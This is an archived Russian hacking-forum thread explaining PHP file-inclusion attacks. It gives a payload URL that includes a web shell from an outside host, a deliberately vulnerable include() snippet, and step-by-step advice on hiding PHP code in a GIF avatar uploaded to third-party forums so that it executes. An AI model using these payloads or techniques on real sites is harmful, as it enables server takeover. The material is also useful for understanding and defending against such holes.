ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.11.2009, 22:56
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от B0o0M
index.php?page=http://nabstre.tu2.ru/shell.txt? вот почему в конце ? никак не пойму,
если можно то плиссс с примером исходного кода
http://forum.antichat.ru/thread23501.html
см Примечания к перовму разделу
|
|
|
12.11.2009, 23:18
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Бум, елементарный пример:
PHP код:
<?
$re = $_GET['re'];
include($re.".php");
?>
localhost/script.php?re=http://localhost/shell.txt?
|
|
|
|
13.06.2011, 02:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
4285
Репутация:
0
|
|
Сообщение от None
Можно залить gif картинку и поместить в конец простенький шелл подставить
Код:
Code:
php highlight:
при инклуде картинки она проинклудится не как картинка а как php код... прочел на форуме одном
можете подробней описать сей процесс ? ни как дойти не может
|
|
|
|
13.06.2011, 02:11
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Смотри... У тебя есть локальный инклуд. Твоя задача - подставить туда такой файл, чтобы выполнялся твой код. Ищешь какие-нибудь форумы, cms'ки и т.д. Регаешься там. И заливаешь туда картинку как аватарку. Но до этого в конец этой картинки вставляешь свой код. Таким образом, проинклудив эту аватарку, у тебя есть выполняется твой evil-code.
|
|
|
|
13.06.2011, 02:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
4285
Репутация:
0
|
|
Вот так я вижу gif-ку с блокнота.
??
Принцип работы уязвимости понял. С картинкой вопрос только. Че да как редактировать. |
|
|
|
13.06.2011, 02:45
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
а что не ясного то?
открыл блокнотом, запихнул, сохранил.
|
|
|
|
13.06.2011, 02:48
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Не пойдёт блокнотом. Он портит бинарные файлы.
Используй любой хекс-редактор.
|
|
|
|
13.06.2011, 02:53
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
и к чему сей час волноваться за сохранность картинки?
его, как мне показалось, интересовала техническая сторона.
|
|
|
|
13.06.2011, 02:54
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Большинство движков испорченный файл картинки не примут.
|
|
|
|
13.06.2011, 02:56
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
спасибо, я знаю. но речь о другом. не стоит грузить человека этим сей час.
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Books PHP
|
FRAGNATIC |
PHP |
186 |
21.02.2010 02:41 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид